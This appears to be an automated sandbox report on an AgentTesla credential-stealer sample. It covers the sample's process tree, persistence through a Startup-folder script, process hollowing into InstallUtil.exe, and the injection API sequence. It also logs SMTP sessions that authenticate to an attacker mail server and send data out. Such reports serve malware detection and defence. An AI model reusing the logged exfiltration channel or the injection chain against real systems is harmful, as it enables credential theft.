                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: ce 2e b0 ff 9e 2a e1 78 cc df c3 64 96 0f 6b 5f 17 0b 35 fb 15 27 c2 1c 08 a0 f3 a8 55 a5 a4 c2 f0 df a9 31 01 aa fc 5b ed ed 34 8a e5 5a f1 a2 8e 83 1f 07 66 49 2d 28 a7 be fd 72 12 18 98 1d 47 f6 85 0c 53 59 84 b6 a4 40 35 99 01 95 4f 66 cd 16 b7 de 86 da 1a 4f f6 2d 32 f4 10 2d 8c 81 a1 ad 0d f2 47 50 e1 b4 ac b1 87 0a c9 c7 b2 58 10 ad e8 8b cc 14 0e 16 3c 66 a6 54 db cf b1 91 cd 6e 73 87 fe 15 f8 df eb 23 ae 40 39 06 47 83 e3 f7 89 b6 0d cb 94 55 8b b9 a6 03 59 7a 90 26 2d f9 40 a9 1f 05 c5 5b 3a 15 47 a5 17 f2 5d 7a 26 56 73 c6 7e 37 e1 ed a3 71 de cd 30 ce 35 18 2e cb df 08 49 4d 29 c1 a2 2d 0f 77 c2 a8 f1 f1 ec 97 ae 4e 61 f2 e8 f1 21 48 dd ed ab 6d 26 02 b8 4c 79 ac 6d 49 bb 7a 8e 7d e7 8e 7b aa 55 a3 48 02 ac 43 04 65 eb 85 62 7f 37 35 21 b1 08
                                                                                  Data Ascii: .*xdk_5'U1[4ZfI-(rGSY@5OfO-2-GPX<fTns#@9GUYz&-@[:G]z&Vs~7q05.IM)-wNa!Hm&LymIz}{UHCeb75!
                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: e2 c5 fe 72 da ac a3 c6 83 6a ea 83 6b 0e 32 39 69 c1 6f 6e ec 7a 7b ee cf a6 09 d6 93 24 ce 3e 73 87 1b 1d f7 fa 8e d9 e0 21 d4 09 b7 9f d2 37 bb 09 7f cc 8a 57 68 14 33 d9 aa e0 da 9c c9 52 ca 30 74 68 0a 55 61 0b 43 6b d7 58 8b e9 e6 7a 07 8b 4b 01 8d fe 4a 47 35 32 aa 5b 34 9f fc 52 6a 4c d3 fc 80 23 88 66 c1 96 c3 b6 c7 b1 44 b4 6f 59 3d b7 85 8b c3 7b 6e 8a df 20 81 8b b7 73 98 a0 7d bb e8 70 41 2f 8c 4d e6 b5 b8 a1 99 85 11 e4 0f fe d5 8e 55 93 fc e1 43 c1 bb ed 30 1c 21 3c b7 22 14 9c 6b 21 22 c8 13 bc f7 38 a6 02 ad 8a e7 9a 0e d9 49 0f 23 ae e5 e2 f9 73 ff f1 1b f6 b4 c8 de 82 e5 ae ba ff ad 1a b6 6d ef 19 c4 af 50 c4 ad 64 cf c2 05 f9 08 30 c0 e0 e3 5c eb f0 1d 02 30 44 6f de 36 b4 6b 50 a3 df b4 d7 3b 96 55 ac ea db 44 2a c8 4e b7 8d 9d ab ba
                                                                                  Data Ascii: rjk29ionz{$>s!7Wh3R0thUaCkXzKJG52[4RjL#fDoY={n s}pA/MUC0!<"k!"8I#smPd0\0Do6kP;UD*N
                                                                                  2024-12-03 14:16:19 UTC4096INData Raw: 55 5b 34 fd 45 7f f6 cb 0f 6a 8c 84 dd 9f ed 1a 00 2b 40 c2 6b 08 0b 6c 02 b3 a2 f0 03 01 fd bf e2 ea ea 98 87 71 e7 2a 4f 03 f0 52 d9 fa 56 b0 79 ce d5 b1 11 7b 46 03 21 2a 0c 97 7a 42 1f 78 61 7c fa fe bf 96 02 27 5b 12 3f 88 4f be 74 cb fb 86 6b 5f bf 0b 32 4a 59 a7 b4 51 f4 ea a6 59 46 b6 fe bc d8 84 dc fc 3a 6c bc b9 a7 38 8d f8 74 0c b2 84 4d 36 e7 6e a6 cd 91 ec b5 a5 80 da d5 96 ff 95 b2 b5 3f 0c 74 9e a2 f0 6f 65 92 55 0e 92 40 e8 22 88 8a 8e 69 ac 03 ef 4d 3b 59 5e 3f 1a 46 68 d4 1a 04 70 95 43 54 b2 7d 82 30 70 65 da 57 d5 c2 0c 15 b6 ff 91 d3 dd 32 f7 e7 da 3b 90 d8 0e 00 79 0f 4f 21 1f 0a ad 73 87 d4 91 f1 f3 60 91 37 48 d5 45 65 2b 0b 6e c9 40 22 b9 0d 73 81 c2 ce 0f 98 e0 b8 06 20 6e 86 f3 b8 9e 30 f6 ec 6d 7b 56 d7 14 fa 98 d0 20 d8 4b 0f
                                                                                  Data Ascii: U[4Ej+@klq*ORVy{F!*zBxa|'[?Otk_2JYQYF:l8tM6n?toeU@"iM;Y^?FhpCT}0peW2;yO!s`7HEe+n@"s n0m{V K


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.849719104.26.13.2054433908C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-03 14:16:41 UTC155OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-12-03 14:16:42 UTC425INHTTP/1.1 200 OK
                                                                                  Date: Tue, 03 Dec 2024 14:16:42 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 12
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ec42d0eff404405-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2967&min_rtt=1756&rtt_var=1524&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1662870&cwnd=221&unsent_bytes=0&cid=dff8bf6e0d6a9418&ts=455&x=0"
                                                                                  2024-12-03 14:16:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                  Data Ascii: 8.46.123.228


                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Dec 3, 2024 15:16:07.486469030 CET58749713162.254.34.31192.168.2.8220 server1.educt.shop ESMTP Postfix
                                                                                  Dec 3, 2024 15:16:07.489928007 CET49713587192.168.2.8162.254.34.31EHLO 928100
                                                                                  Dec 3, 2024 15:16:07.879735947 CET58749713162.254.34.31192.168.2.8250-server1.educt.shop
                                                                                  250-PIPELINING
                                                                                  250-SIZE 204800000
                                                                                  250-ETRN
                                                                                  250-STARTTLS
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-AUTH=PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-DSN
                                                                                  250 CHUNKING
                                                                                  Dec 3, 2024 15:16:07.880712032 CET49713587192.168.2.8162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                  Dec 3, 2024 15:16:08.269876003 CET58749713162.254.34.31192.168.2.8334 UGFzc3dvcmQ6
                                                                                  Dec 3, 2024 15:16:08.677768946 CET58749713162.254.34.31192.168.2.8235 2.7.0 Authentication successful
                                                                                  Dec 3, 2024 15:16:08.683979034 CET49713587192.168.2.8162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:09.093364954 CET58749713162.254.34.31192.168.2.8250 2.1.0 Ok
                                                                                  Dec 3, 2024 15:16:09.093625069 CET49713587192.168.2.8162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:09.501035929 CET58749713162.254.34.31192.168.2.8250 2.1.5 Ok
                                                                                  Dec 3, 2024 15:16:09.507378101 CET49713587192.168.2.8162.254.34.31DATA
                                                                                  Dec 3, 2024 15:16:09.895960093 CET58749713162.254.34.31192.168.2.8354 End data with <CR><LF>.<CR><LF>
                                                                                  Dec 3, 2024 15:16:09.896934032 CET49713587192.168.2.8162.254.34.31.
                                                                                  Dec 3, 2024 15:16:10.405380964 CET58749713162.254.34.31192.168.2.8250 2.0.0 Ok: queued as 47EA888F3F
                                                                                  Dec 3, 2024 15:16:44.066595078 CET58749720162.254.34.31192.168.2.8220 server1.educt.shop ESMTP Postfix
                                                                                  Dec 3, 2024 15:16:44.066879988 CET49720587192.168.2.8162.254.34.31EHLO 928100
                                                                                  Dec 3, 2024 15:16:44.458098888 CET58749720162.254.34.31192.168.2.8250-server1.educt.shop
                                                                                  250-PIPELINING
                                                                                  250-SIZE 204800000
                                                                                  250-ETRN
                                                                                  250-STARTTLS
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-AUTH=PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-DSN
                                                                                  250 CHUNKING
                                                                                  Dec 3, 2024 15:16:44.458395958 CET49720587192.168.2.8162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                  Dec 3, 2024 15:16:44.848861933 CET58749720162.254.34.31192.168.2.8334 UGFzc3dvcmQ6
                                                                                  Dec 3, 2024 15:16:45.246509075 CET58749720162.254.34.31192.168.2.8235 2.7.0 Authentication successful
                                                                                  Dec 3, 2024 15:16:45.246934891 CET49720587192.168.2.8162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:45.638490915 CET58749720162.254.34.31192.168.2.8250 2.1.0 Ok
                                                                                  Dec 3, 2024 15:16:45.638801098 CET49720587192.168.2.8162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:46.035428047 CET58749720162.254.34.31192.168.2.8250 2.1.5 Ok
                                                                                  Dec 3, 2024 15:16:46.035665035 CET49720587192.168.2.8162.254.34.31DATA
                                                                                  Dec 3, 2024 15:16:46.428548098 CET58749720162.254.34.31192.168.2.8354 End data with <CR><LF>.<CR><LF>
                                                                                  Dec 3, 2024 15:16:46.430635929 CET49720587192.168.2.8162.254.34.31.
                                                                                  Dec 3, 2024 15:16:46.930126905 CET58749720162.254.34.31192.168.2.8250 2.0.0 Ok: queued as CB8D289030
                                                                                  Dec 3, 2024 15:18:22.728344917 CET49720587192.168.2.8162.254.34.31QUIT
                                                                                  Dec 3, 2024 15:18:23.119896889 CET58749720162.254.34.31192.168.2.8221 2.0.0 Bye

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:09:15:42
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Ref#1550238.exe"
                                                                                  Imagebase:0x2b0000
                                                                                  File size:348'128 bytes
                                                                                  MD5 hash:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2528281598.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:09:16:02
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                  Imagebase:0xf90000
                                                                                  File size:42'064 bytes
                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:16:14
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                  Imagebase:0x7ff7cf9b0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:09:16:14
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                  Imagebase:0xe0000
                                                                                  File size:348'128 bytes
                                                                                  MD5 hash:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 45%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:09:16:39
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                  Imagebase:0x950000
                                                                                  File size:42'064 bytes
                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.5%
                                                                                    Dynamic/Decrypted Code Coverage:95.3%
                                                                                    Signature Coverage:3.8%
                                                                                    Total number of Nodes:236
                                                                                    Total number of Limit Nodes:10
                                                                                    execution_graph 63715 6b8ccc8 63716 6b8ccdd 63715->63716 63719 6b8cdc1 63716->63719 63721 6b8cde4 63719->63721 63720 6b8ccf3 63721->63720 63722 6b8dae8 VirtualProtect 63721->63722 63723 6b8dae1 VirtualProtect 63721->63723 63722->63721 63723->63721 63646 6c4e860 63647 6c4e8a0 VirtualAlloc 63646->63647 63649 6c4e8da 63647->63649 63671 a5da60 63672 a5daa6 63671->63672 63675 a5dc40 63672->63675 63678 a5bda0 63675->63678 63679 a5dca8 DuplicateHandle 63678->63679 63680 a5db93 63679->63680 63698 5e76100 63699 5e7611a 63698->63699 63700 5e7612a 63699->63700 63703 6c45f78 63699->63703 63707 6c45f18 63699->63707 63704 6c45f88 63703->63704 63706 6c4d428 VirtualProtect 63704->63706 63705 6c401d9 63706->63705 63708 6c45f1c 63707->63708 63709 6c401d9 63708->63709 63710 6c4d428 VirtualProtect 63708->63710 63710->63709 63582 6b8de20 63583 6b8de35 63582->63583 63587 6b8df73 63583->63587 63596 6b8def6 63583->63596 63584 6b8de4b 63590 6b8df79 63587->63590 63588 6b8e156 63594 6b8dae8 VirtualProtect 63588->63594 63595 6b8dae1 VirtualProtect 63588->63595 63589 6b8e248 63589->63584 63590->63588 63590->63589 63605 6b8dae8 63590->63605 63609 6b8dae1 63590->63609 63591 6b8e189 63591->63584 63594->63591 63595->63591 63597 6b8df15 63596->63597 63598 6b8e156 63597->63598 63599 6b8e248 63597->63599 63601 6b8dae8 VirtualProtect 63597->63601 63602 6b8dae1 VirtualProtect 63597->63602 63603 6b8dae8 VirtualProtect 63598->63603 63604 6b8dae1 VirtualProtect 63598->63604 63599->63584 63600 6b8e189 63600->63584 63601->63597 63602->63597 63603->63600 63604->63600 63606 6b8db30 VirtualProtect 63605->63606 63608 6b8db6b 63606->63608 63608->63590 63610 6b8dae8 VirtualProtect 63609->63610 63612 6b8db6b 63610->63612 63612->63590 63613 6b893a0 63614 6b893b5 63613->63614 63619 6b89649 63614->63619 63624 6b893d1 63614->63624 63629 6b893e0 63614->63629 63615 6b893cb 63621 6b8943c 63619->63621 63620 6b8944b 63620->63615 63621->63620 63634 6b8ca2a 63621->63634 63638 6b8ca30 63621->63638 63626 6b89407 63624->63626 63625 6b8944b 63625->63615 63626->63625 63627 6b8ca2a SleepEx 63626->63627 63628 6b8ca30 SleepEx 63626->63628 63627->63626 63628->63626 63631 6b89407 63629->63631 63630 6b8944b 63630->63615 63631->63630 63632 6b8ca2a SleepEx 63631->63632 63633 6b8ca30 SleepEx 63631->63633 63632->63631 63633->63631 63635 6b8ca30 SleepEx 63634->63635 63637 6b8caae 63635->63637 63637->63621 63639 6b8ca70 SleepEx 63638->63639 63641 6b8caae 63639->63641 63641->63621 63650 a0d118 63651 a0d130 63650->63651 63652 a0d18b 63651->63652 63654 6c4de80 63651->63654 63655 6c4dea8 63654->63655 63658 6c4e310 63655->63658 63656 6c4decf 63659 6c4e33d 63658->63659 63662 6c4e4d3 63659->63662 63663 6c4d428 63659->63663 63662->63656 63665 6c4d44f 63663->63665 63667 6c4d878 63665->63667 63668 6c4d8c0 VirtualProtect 63667->63668 63670 6c4d50c 63668->63670 63670->63656 63711 63b02d0 63712 63b031e NtProtectVirtualMemory 63711->63712 63714 63b0368 63712->63714 63681 63c20e0 63682 63c20f5 63681->63682 63683 63c210b 63682->63683 63685 63c2d62 63682->63685 63687 63c2d68 63685->63687 63690 63c6dbe 63687->63690 63694 63c6dc8 63687->63694 63691 63c6e1d CopyFileA 63690->63691 63693 63c6f1f 63691->63693 63695 63c6e1d CopyFileA 63694->63695 63697 63c6f1f 63695->63697 63724 63c79c0 63725 63c79d5 63724->63725 63731 63c7a00 63725->63731 63734 63c7bbf 63725->63734 63737 63c7c31 63725->63737 63740 63c79f0 63725->63740 63732 63c7a2a 63731->63732 63743 63c9401 63732->63743 63735 63c7a5d 63734->63735 63736 63c9401 10 API calls 63735->63736 63736->63735 63738 63c7a5d 63737->63738 63739 63c9401 10 API calls 63738->63739 63739->63738 63741 63c7a00 63740->63741 63742 63c9401 10 API calls 63741->63742 63742->63741 63744 63c9413 63743->63744 63748 63c96b9 63744->63748 63753 63c9932 63744->63753 63745 63c9447 63745->63732 63749 63c96d1 63748->63749 63758 63c9cf8 63749->63758 63773 63c9d08 63749->63773 63750 63c94cb 63750->63745 63754 63c96b8 63753->63754 63755 63c94cb 63753->63755 63756 63c9cf8 10 API calls 63754->63756 63757 63c9d08 10 API calls 63754->63757 63755->63745 63756->63755 63757->63755 63759 63c9d1d 63758->63759 63772 63c9d3f 63759->63772 63788 63caabc 63759->63788 63793 63cab89 63759->63793 63798 63ca5d3 63759->63798 63803 63caff7 63759->63803 63808 63ca8d6 63759->63808 63812 63cad54 63759->63812 63817 63ca4bb 63759->63817 63822 63cb058 63759->63822 63828 63ca778 63759->63828 63833 63ca138 63759->63833 63838 63cabbe 63759->63838 63843 63ca7bd 63759->63843 63772->63750 63774 63c9d1d 63773->63774 63775 63caabc 2 API calls 63774->63775 63776 63ca7bd 2 API calls 63774->63776 63777 63cabbe 2 API calls 63774->63777 63778 63ca138 2 API calls 63774->63778 63779 63ca778 2 API calls 63774->63779 63780 63cb058 2 API calls 63774->63780 63781 63ca4bb 2 API calls 63774->63781 63782 63cad54 2 API calls 63774->63782 63783 63ca8d6 2 API calls 63774->63783 63784 63caff7 2 API calls 63774->63784 63785 63ca5d3 2 API calls 63774->63785 63786 63cab89 2 API calls 63774->63786 63787 63c9d3f 63774->63787 63775->63787 63776->63787 63777->63787 63778->63787 63779->63787 63780->63787 63781->63787 63782->63787 63783->63787 63784->63787 63785->63787 63786->63787 63787->63750 63789 63caacb 63788->63789 63847 63b21a2 63789->63847 63851 63b21a8 63789->63851 63790 63c9e95 63794 63cab4d 63793->63794 63795 63c9e95 63793->63795 63794->63795 63796 63b21a8 WriteProcessMemory 63794->63796 63797 63b21a2 WriteProcessMemory 63794->63797 63796->63795 63797->63795 63799 63ca5e2 63798->63799 63801 63b21a8 WriteProcessMemory 63799->63801 63802 63b21a2 WriteProcessMemory 63799->63802 63800 63c9e95 63801->63800 63802->63800 63804 63cb006 63803->63804 63855 63b14f8 63804->63855 63859 63b14f0 63804->63859 63805 63cb032 63809 63ca7e3 63808->63809 63809->63808 63863 63b1f0a 63809->63863 63867 63b1f10 63809->63867 63813 63cad5a 63812->63813 63815 63b14f8 Wow64SetThreadContext 63813->63815 63816 63b14f0 Wow64SetThreadContext 63813->63816 63814 63cad9c 63815->63814 63816->63814 63818 63ca4d3 63817->63818 63871 63cb608 63818->63871 63875 63cb5f9 63818->63875 63819 63ca4eb 63823 63cb05e 63822->63823 63824 63caff6 63822->63824 63826 63b14f8 Wow64SetThreadContext 63824->63826 63827 63b14f0 Wow64SetThreadContext 63824->63827 63825 63cb032 63826->63825 63827->63825 63829 63caed0 63828->63829 63830 63c9e95 63828->63830 63892 63b2818 63829->63892 63896 63b2820 63829->63896 63834 63ca147 63833->63834 63836 63b21a8 WriteProcessMemory 63834->63836 63837 63b21a2 WriteProcessMemory 63834->63837 63835 63ca110 63835->63772 63836->63835 63837->63835 63839 63c9e95 63838->63839 63840 63ca7bd 63838->63840 63841 63b1f0a VirtualAllocEx 63840->63841 63842 63b1f10 VirtualAllocEx 63840->63842 63841->63840 63842->63840 63844 63ca7c7 63843->63844 63845 63b1f0a VirtualAllocEx 63844->63845 63846 63b1f10 VirtualAllocEx 63844->63846 63845->63844 63846->63844 63848 63b21a8 WriteProcessMemory 63847->63848 63850 63b2247 63848->63850 63850->63790 63852 63b21f0 WriteProcessMemory 63851->63852 63854 63b2247 63852->63854 63854->63790 63856 63b153d Wow64SetThreadContext 63855->63856 63858 63b1585 63856->63858 63858->63805 63860 63b14f3 Wow64SetThreadContext 63859->63860 63862 63b1585 63860->63862 63862->63805 63864 63b1f10 VirtualAllocEx 63863->63864 63866 63b1f8d 63864->63866 63866->63809 63868 63b1f50 VirtualAllocEx 63867->63868 63870 63b1f8d 63868->63870 63870->63809 63872 63cb61f 63871->63872 63873 63cb641 63872->63873 63879 63cb7d1 63872->63879 63873->63819 63876 63cb60b 63875->63876 63877 63cb641 63876->63877 63878 63cb7d1 2 API calls 63876->63878 63877->63819 63878->63877 63880 63cb7e0 63879->63880 63884 63b0d30 63880->63884 63888 63b0d24 63880->63888 63885 63b0d94 CreateProcessA 63884->63885 63887 63b0f1c 63885->63887 63889 63b0d94 CreateProcessA 63888->63889 63891 63b0f1c 63889->63891 63893 63b2820 NtResumeThread 63892->63893 63895 63b289d 63893->63895 63895->63830 63897 63b2868 NtResumeThread 63896->63897 63899 63b289d 63897->63899 63899->63830 63642 a5b5b8 63643 a5b600 GetModuleHandleW 63642->63643 63644 a5b5fa 63642->63644 63645 a5b62d 63643->63645 63644->63643
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: e269c115b07a106622afdc9513cc30f89ab3080cf085e5301c99927d69e441c2
                                                                                    • Instruction ID: e65f58e576fa973858e5e5d5a5784bf2885237630671c34a52ad064ad243de09
                                                                                    • Opcode Fuzzy Hash: e269c115b07a106622afdc9513cc30f89ab3080cf085e5301c99927d69e441c2
                                                                                    • Instruction Fuzzy Hash: 16B2F674A40229CFDB54EFA8C994BADB7B6FF88700F158095E505AB3A9DB709C81CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 402 63cd2c0-63cd2e1 403 63cd2e8-63cd378 call 63cde11 402->403 404 63cd2e3 402->404 409 63cd37e-63cd3bb 403->409 404->403 411 63cd3bd-63cd3c8 409->411 412 63cd3ca 409->412 413 63cd3d4-63cd4ef 411->413 412->413 424 63cd501-63cd52c 413->424 425 63cd4f1-63cd4f7 413->425 426 63cdcf4-63cdd10 424->426 425->424 427 63cdd16-63cdd31 426->427 428 63cd531-63cd694 call 63cc1a8 426->428 439 63cd6a6-63cd837 call 63c9bb0 call 63c69d8 428->439 440 63cd696-63cd69c 428->440 452 63cd89c-63cd8a6 439->452 453 63cd839-63cd83d 439->453 440->439 456 63cdacd-63cdaec 452->456 454 63cd83f-63cd840 453->454 455 63cd845-63cd897 453->455 457 63cdb72-63cdbdd 454->457 455->457 458 63cd8ab-63cd9f1 call 63cc1a8 456->458 459 63cdaf2-63cdb1c 456->459 476 63cdbef-63cdc3a 457->476 477 63cdbdf-63cdbe5 457->477 488 63cdac6-63cdac7 458->488 489 63cd9f7-63cdac3 call 63cc1a8 458->489 465 63cdb1e-63cdb6c 459->465 466 63cdb6f-63cdb70 459->466 465->466 466->457 479 63cdcd9-63cdcf1 476->479 480 63cdc40-63cdcd8 476->480 477->476 479->426 480->479 488->456 489->488
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8
                                                                                    • API String ID: 0-4194326291
